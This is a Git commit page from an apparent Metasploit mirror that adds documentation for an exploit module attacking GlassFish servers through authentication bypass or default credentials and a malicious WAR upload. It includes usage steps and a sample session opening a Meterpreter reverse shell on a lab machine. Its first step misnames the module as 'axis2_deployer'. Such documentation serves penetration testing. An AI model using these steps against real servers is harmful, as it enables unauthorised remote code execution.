infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Documentation on glassfish_deployer

bug/bundler_fix
itsmeroy2012 2017-03-27 19:23:39 +05:30
parent 91c7a1bc34
commit 8ad61a11c8
1 changed files with 51 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

51
documentation/modules/exploit/multi/http/glassfish_deployer.md Normal file
View File

@ -0,0 +1,51 @@
##Description
This module logs in to an GlassFish Server (Open Source or Commercial) using various methods (such as authentication bypass, default credentials, or user-supplied login), and deploys a malicious war file in order to get remote code execution. It has been tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer GlassFish versions do not allow remote access (Secure Admin) by default, but is required for exploitation.
## GlassFish
GlassFish is an open-source application server project started by Sun Microsystems for the Java EE platform and now sponsored by Oracle Corporation. The supported version is called Oracle GlassFish Server. GlassFish is free software, dual-licensed under two free software licences: the Common Development and Distribution License (CDDL) and the GNU General Public License (GPL) with the classpath exception.
## Verification Steps
1. Do: ```use exploit/multi/http/axis2_deployer```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set USERNAME [Username]```
4. Do: ```set PASSWORD [Password]```
5. Do: ```run```
##Sample Output
```
msf > use exploit/multi/http/glassfish_deployer
msf exploit(glassfish_deployer) > set RHOST 172.16.182.237
RHOST => 172.16.182.237
msf exploit(glassfish_deployer) > set USERNAME admin
USERNAME => admin
msf exploit(glassfish_deployer) > set PASSWORD admin123
PASSWORD => admin123
msf exploit(glassfish_deployer) > exploit
[*] Started reverse TCP handler on 172.16.182.112:4444
[*] Glassfish edition: GlassFish Server Open Source Edition 3.0.1
[*] Trying GlassFish authentication bypass..
[+] http://172.16.182.237:4848// - GlassFish - SUCCESSFUL authentication bypass
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /icDfejbl6Vc9ZobfgVv9LIBES/SV7fVtWuTQFZqtzMPiJ.jsp...
[*] Sending stage (30355 bytes) to 172.16.182.237
[*] Meterpreter session 1 opened (172.16.182.112:4444 -> 172.16.182.237:1472) at 2017-03-27 19:07:58 -0500
[*] Getting information to undeploy...
[*] Undeploying icDfejbl6Vc9ZobfgVv9LIBES...
[*] Undeployment complete.
meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer : juan-6ed9db6ca8
OS : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```